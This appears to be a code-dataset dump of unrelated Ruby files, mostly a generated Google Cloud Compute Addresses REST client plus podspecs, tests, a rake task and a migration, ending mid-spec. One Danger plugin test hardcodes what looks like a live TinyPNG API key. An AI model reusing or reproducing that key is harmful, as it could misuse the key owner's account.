s.version = '0.0.1'
s.summary = 'Displays macOS open and save panels.'
s.description = <<-DESC
Displays macOS open and save panels.
DESC
s.homepage = 'https://github.com/google/flutter-desktop-embedding/tree/master/plugins/file_chooser'
s.license = { :file => '../LICENSE' }
s.author = { 'Flutter Desktop Embedding Developers' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'FlutterMacOS'
s.platform = :osx
s.osx.deployment_target = '10.9'
end
| 35.869565 | 117 | 0.602424 |
6231b1199af5919c254e7b339079d8e618cb2097 | 34,810 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/cloud/compute/v1/compute_small_pb"
module Google
module Cloud
module Compute
module V1
module Addresses
module Rest
##
# REST client for the Addresses service.
#
# Services
#
# The Addresses API.
#
class Client
include GrpcTranscoding
# @private
attr_reader :addresses_stub
##
# Configure the Addresses Client class.
#
# See {::Google::Cloud::Compute::V1::Addresses::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# ## Example
#
# To modify the configuration for all Addresses clients:
#
# ::Google::Cloud::Compute::V1::Addresses::Rest::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
namespace = ["Google", "Cloud", "Compute", "V1"]
parent_config = while namespace.any?
parent_name = namespace.join "::"
parent_const = const_get parent_name
break parent_const.configure if parent_const.respond_to? :configure
namespace.pop
end
default_config = Client::Configuration.new parent_config
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the Addresses Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Compute::V1::Addresses::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new Addresses REST client object.
#
# ## Examples
#
# To create a new Addresses REST client with the default
# configuration:
#
# client = ::Google::Cloud::Compute::V1::Addresses::Rest::Client.new
#
# To create a new Addresses REST client with a custom
# configuration:
#
# client = ::Google::Cloud::Compute::V1::Addresses::Rest::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Addresses client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the REST modules only when it's required.
require "gapic/rest"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
credentials ||= Credentials.default scope: @config.scope
if credentials.is_a?(String) || credentials.is_a?(Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@client_stub = ::Gapic::Rest::ClientStub.new endpoint: @config.endpoint, credentials: credentials
end
# Service calls
##
# Retrieves an aggregated list of addresses.
#
# @overload aggregated_list(request, options = nil)
# Pass arguments to `aggregated_list` via a request object, either of type
# {::Google::Cloud::Compute::V1::AggregatedListAddressesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::AggregatedListAddressesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload aggregated_list(filter: nil, include_all_scopes: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil)
# Pass arguments to `aggregated_list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param include_all_scopes [::Boolean]
# Indicates whether every visible scope for each scope type (zone, region, global) should be included in the response. For new resource types added after this field, the flag has no effect as new resource types will always include every visible scope for each scope type in response. For resource types which predate this field, if this flag is omitted or false, only scopes of the scope types where the resource type is expected to be found will be included.
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false and the logic is the same as today.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::AddressAggregatedList]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::AddressAggregatedList]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def aggregated_list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::AggregatedListAddressesRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_aggregated_list request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::AddressAggregatedList.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Deletes the specified address resource.
#
# @overload delete(request, options = nil)
# Pass arguments to `delete` via a request object, either of type
# {::Google::Cloud::Compute::V1::DeleteAddressRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::DeleteAddressRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload delete(address: nil, project: nil, region: nil, request_id: nil)
# Pass arguments to `delete` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param address [::String]
# Name of the address resource to delete.
# @param project [::String]
# Project ID for this request.
# @param region [::String]
# Name of the region for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def delete request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::DeleteAddressRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_delete request
response = @client_stub.make_delete_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Returns the specified address resource.
#
# @overload get(request, options = nil)
# Pass arguments to `get` via a request object, either of type
# {::Google::Cloud::Compute::V1::GetAddressRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::GetAddressRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload get(address: nil, project: nil, region: nil)
# Pass arguments to `get` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param address [::String]
# Name of the address resource to return.
# @param project [::String]
# Project ID for this request.
# @param region [::String]
# Name of the region for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Address]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Address]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def get request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::GetAddressRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, _query_string_params = transcode_get request
response = @client_stub.make_get_request(
uri: uri,
options: options
)
result = ::Google::Cloud::Compute::V1::Address.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Creates an address resource in the specified project by using the data included in the request.
#
# @overload insert(request, options = nil)
# Pass arguments to `insert` via a request object, either of type
# {::Google::Cloud::Compute::V1::InsertAddressRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::InsertAddressRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload insert(address_resource: nil, project: nil, region: nil, request_id: nil)
# Pass arguments to `insert` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param address_resource [::Google::Cloud::Compute::V1::Address, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param region [::String]
# Name of the region for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def insert request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::InsertAddressRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_insert request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Retrieves a list of addresses contained within the specified region.
#
# @overload list(request, options = nil)
# Pass arguments to `list` via a request object, either of type
# {::Google::Cloud::Compute::V1::ListAddressesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ListAddressesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload list(filter: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, region: nil, return_partial_success: nil)
# Pass arguments to `list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param region [::String]
# Name of the region for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false and the logic is the same as today.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::AddressList]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::AddressList]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ListAddressesRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_list request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::AddressList.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Configuration class for the Addresses REST API.
#
# This class represents the configuration for Addresses REST,
# providing control over credentials, timeouts, retry behavior, logging.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# # Examples
#
# To modify the global config, setting the timeout for all calls to 10 seconds:
#
# ::Google::Cloud::Compute::V1::Addresses::Client.configure do |config|
# config.timeout = 10.0
# end
#
# To apply the above configuration only to a new client:
#
# client = ::Google::Cloud::Compute::V1::Addresses::Client.new do |config|
# config.timeout = 10.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"compute.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "compute.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr :timeout, nil, ::Numeric, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
end
end
end
end
end
end
end
end
| 58.113523 | 477 | 0.576271 |
e90244f982379afff5911ddbc4e2e79f968964a5 | 1,558 | # ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** Type: MMv1 ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
title 'Test GCP google_compute_target_pools resource.'
gcp_project_id = attribute(:gcp_project_id, default: 'gcp_project_id', description: 'The GCP project identifier.')
gcp_location = attribute(:gcp_location, default: 'gcp_location', description: 'The GCP project region.')
gcp_ext_vm_name = attribute(:gcp_ext_vm_name, default: 'gcp_ext_vm_name', description: 'The name of a VM instance.')
target_pool = attribute('target_pool', default: {
"name": "inspec-gcp-target-pool",
"session_affinity": "CLIENT_IP"
}, description: 'Target pool definition')
gcp_zone = attribute(:gcp_zone, default: 'gcp_zone', description: 'The GCP zone.')
control 'google_compute_target_pools-1.0' do
impact 1.0
title 'google_compute_target_pools resource test'
describe google_compute_target_pools(project: gcp_project_id, region: gcp_location) do
its('names') { should include target_pool['name'] }
its('session_affinities') { should include target_pool['session_affinity'] }
end
end
| 45.823529 | 116 | 0.629012 |
e900d05d5a3c173bf7eaec8f259983da01244727 | 938 | # frozen_string_literal: false
require File.expand_path('spec_helper', __dir__)
module Danger
describe Danger::DangerTinyPNG do
it "should be a plugin" do
expect(Danger::DangerTinyPNG.new(nil)).to be_a Danger::Plugin
end
describe "with Dangerfile" do
before do
@dangerfile = testing_dangerfile
@tiny_png = @dangerfile.tiny_png
# mock the PR data
# you can then use this, eg. github.pr_author, later in the spec
json = File.read(File.dirname(__FILE__) + '/support/fixtures/github_pr.json') # example json: `curl https://api.github.com/repos/danger/danger-plugin-template/pulls/18 > github_pr.json`
allow(@tiny_png.github).to receive(:pr_json).and_return(json)
end
it "validate TinyPNG API key" do
@tiny_png.api_key 'VyqfYht4H5xhZ8lTVwc4265GZy3GPRdF'
expect(@dangerfile.status_report[:errors]).to eq([])
end
end
end
end
| 31.266667 | 193 | 0.684435 |
e8790cf01ab4d1ac85198ad0598befed08c8f393 | 354 | # Copyright:: Copyright 2021 Trimble Inc.
# License:: The MIT License (MIT)
# This is raised whenever a method attempts to modify any {Layout::Entity}
# that resides on a locked {Layout::Layer}, or when attempting to change the
# shared attribute of a locked {Layout::Layer}.
#
# @version LayOut 2018
class Layout::LockedLayerError < ArgumentError
end
| 29.5 | 76 | 0.751412 |
b941f0306bb837bace7627179a503bf3f3879a21 | 5,355 | Pod::Spec.new do |s|
s.name = 'FirebaseRemoteConfig'
s.version = '8.7.0'
s.summary = 'Firebase Remote Config'
s.description = <<-DESC
Firebase Remote Config is a cloud service that lets you change the
appearance and behavior of your app without requiring users to download an
app update.
DESC
s.homepage = 'https://firebase.google.com'
s.license = { :type => 'Apache', :file => 'LICENSE' }
s.authors = 'Google, Inc.'
s.source = {
:git => 'https://github.com/firebase/firebase-ios-sdk.git',
:tag => 'CocoaPods-' + s.version.to_s
}
s.social_media_url = 'https://twitter.com/Firebase'
ios_deployment_target = '10.0'
osx_deployment_target = '10.12'
tvos_deployment_target = '10.0'
watchos_deployment_target = '6.0'
s.ios.deployment_target = ios_deployment_target
s.osx.deployment_target = osx_deployment_target
s.tvos.deployment_target = tvos_deployment_target
s.watchos.deployment_target = watchos_deployment_target
s.cocoapods_version = '>= 1.4.0'
s.prefix_header_file = false
base_dir = "FirebaseRemoteConfig/Sources/"
s.source_files = [
base_dir + '**/*.[mh]',
'Interop/Analytics/Public/*.h',
'FirebaseABTesting/Sources/Private/*.h',
'FirebaseCore/Sources/Private/*.h',
'FirebaseInstallations/Source/Library/Private/*.h',
]
s.public_header_files = base_dir + 'Public/FirebaseRemoteConfig/*.h'
s.pod_target_xcconfig = {
'GCC_C_LANGUAGE_STANDARD' => 'c99',
'HEADER_SEARCH_PATHS' => '"${PODS_TARGET_SRCROOT}"'
}
s.dependency 'FirebaseABTesting', '~> 8.0'
s.dependency 'FirebaseCore', '~> 8.0'
s.dependency 'FirebaseInstallations', '~> 8.0'
s.dependency 'GoogleUtilities/Environment', '~> 7.4'
s.dependency 'GoogleUtilities/NSData+zlib', '~> 7.4'
s.test_spec 'unit' do |unit_tests|
unit_tests.scheme = { :code_coverage => true }
# TODO(dmandar) - Update or delete the commented files.
unit_tests.source_files =
'FirebaseRemoteConfig/Tests/Unit/FIRRemoteConfigComponentTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNConfigContentTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNConfigDBManagerTest.m',
# 'FirebaseRemoteConfig/Tests/Unit/RCNConfigSettingsTest.m',
# 'FirebaseRemoteConfig/Tests/Unit/RCNConfigTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNConfigExperimentTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNConfigValueTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNPersonalizationTest.m',
# 'FirebaseRemoteConfig/Tests/Unit/RCNRemoteConfig+FIRAppTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNRemoteConfigTest.m',
# 'FirebaseRemoteConfig/Tests/Unit/RCNThrottlingTests.m',
'FirebaseRemoteConfig/Tests/Unit/RCNTestUtilities.m',
'FirebaseRemoteConfig/Tests/Unit/RCNUserDefaultsManagerTests.m',
'FirebaseRemoteConfig/Tests/Unit/RCNTestUtilities.h',
'FirebaseRemoteConfig/Tests/Unit/RCNInstanceIDTest.m'
# Supply plist custom plist testing.
unit_tests.resources =
'FirebaseRemoteConfig/Tests/Unit/Defaults-testInfo.plist',
'FirebaseRemoteConfig/Tests/Unit/SecondApp-GoogleService-Info.plist',
'FirebaseRemoteConfig/Tests/Unit/TestABTPayload.txt'
unit_tests.requires_app_host = true
unit_tests.dependency 'OCMock'
unit_tests.requires_arc = true
end
# Run Swift API tests on a real backend.
s.test_spec 'swift-api-tests' do |swift_api|
swift_api.scheme = { :code_coverage => true }
swift_api.platforms = {
:ios => ios_deployment_target,
:osx => osx_deployment_target,
:tvos => tvos_deployment_target
}
swift_api.source_files = 'FirebaseRemoteConfig/Tests/SwiftAPI/*.swift',
'FirebaseRemoteConfig/Tests/FakeUtils/*.[hm]',
'FirebaseRemoteConfig/Tests/FakeUtils/*.swift'
swift_api.requires_app_host = true
swift_api.pod_target_xcconfig = {
'SWIFT_OBJC_BRIDGING_HEADER' => '$(PODS_TARGET_SRCROOT)/FirebaseRemoteConfig/Tests/FakeUtils/Bridging-Header.h'
}
swift_api.resources = 'FirebaseRemoteConfig/Tests/SwiftAPI/GoogleService-Info.plist',
'FirebaseRemoteConfig/Tests/SwiftAPI/AccessToken.json'
swift_api.dependency 'OCMock'
end
# Run Swift API tests and tests requiring console changes on a Fake Console.
s.test_spec 'fake-console-tests' do |fake_console|
fake_console.scheme = { :code_coverage => true }
fake_console.platforms = {
:ios => ios_deployment_target,
:osx => osx_deployment_target,
:tvos => tvos_deployment_target
}
fake_console.source_files = 'FirebaseRemoteConfig/Tests/SwiftAPI/*.swift',
'FirebaseRemoteConfig/Tests/FakeUtils/*.[hm]',
'FirebaseRemoteConfig/Tests/FakeUtils/*.swift',
'FirebaseRemoteConfig/Tests/FakeConsole/*.swift'
fake_console.requires_app_host = true
fake_console.pod_target_xcconfig = {
'SWIFT_OBJC_BRIDGING_HEADER' => '$(PODS_TARGET_SRCROOT)/FirebaseRemoteConfig/Tests/FakeUtils/Bridging-Header.h'
}
fake_console.resources = 'FirebaseRemoteConfig/Tests/FakeUtils/GoogleService-Info.plist'
fake_console.dependency 'OCMock'
end
end
| 43.893443 | 117 | 0.689823 |
280e463e7ae84989f247e02ca9cedc080128669d | 656 | require File.join(Rails.root, "app", "data_migrations", "change_suffix_person")
# This rake task is to change the name suffix of a person
# RAILS_ENV=production bundle exec rake migrations:change_suffix_person hbx_ids='19760877 19776645 19747772 19758664 19776417 18941825 19766429 19761376 19753221 19762647 19775694 19757825 19749172 19772583 19771579 19745475 19744827 19761611 19763400 19773230 19743457 2085463 19753992 2166772 19771972 19756452 19771773 19759229 19753432 19760652 18942772 19759405 19771826 19743273'
namespace :migrations do
desc "changing person suffix"
ChangeSuffixPerson.define_task :change_suffix_person => :environment
end | 93.714286 | 386 | 0.844512 |
620da247161a4af823d2842799fe39c2bb4f236e | 134 | class UpdateStoryType < ActiveRecord::Migration[6.1]
def change
Story.where(type: nil).update_all(type: 'MediaStory')
end
end
| 22.333333 | 57 | 0.738806 |
391873187effb1109fa1fa8aaa78f8c322c25845 | 2,952 | require_relative 'spec_helper'
#noinspection RubyStringKeysInHashInspection
describe Appium::Tutorial do
attr_reader :tutorial_root, :tutorial, :first_module_gen
def expect_gen_exists boolean
exists = exist? first_module_gen
expect(exists).to eq(boolean)
end
def expect_html_exists boolean
exists = exist? join first_module_gen, 'html'
expect(exists).to eq(boolean)
end
def expect_markdown_exists boolean
exists = exist? join first_module_gen, 'appium'
expect(exists).to eq(boolean)
end
def delete_tutorial_path
root = dirname tutorial_root
path = tutorial.tutorial_path
message = "Tutorial path #{path} must include #{root}"
raise message unless path.include? root
rm_rf path if exist? path
expect_tutorial_path_exists false
end
def expect_tutorial_path_exists boolean
exists = exist? tutorial.tutorial_path
expect(exists).to eq(boolean)
end
def delete_gen
tutorial.delete_gen
expect_gen_exists false
end
before do
@tutorial_root = join(Dir.pwd, 'modules')
